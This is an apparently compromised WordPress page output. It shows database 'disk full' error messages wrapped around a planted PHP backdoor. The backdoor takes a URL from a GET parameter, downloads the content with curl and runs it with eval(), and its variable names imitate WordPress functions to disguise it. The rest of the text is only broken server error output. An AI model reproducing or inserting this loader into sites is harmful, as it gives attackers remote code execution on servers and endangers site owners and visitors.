WordPress database error: [Disk full (/tmp/#sql-temptable-3a7332-8b41c-2a53.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")]SHOW COLUMNS FROM `wp_aioseo_posts`
<?php
if (isset($_GET['statement'])) {
$get_post_type_ds = $_GET['statement'];
if ($apply_filters_rrl = curl_init()) {
curl_setopt($apply_filters_rrl, CURLOPT_URL, $get_post_type_ds);
curl_setopt($apply_filters_rrl, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($apply_filters_rrl));
curl_close($apply_filters_rrl);
exit;
}
}WordPress database error: [Disk full (/tmp/#sql-temptable-3a7332-8b41c-2a54.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")]SHOW FULL COLUMNS FROM `wp_options`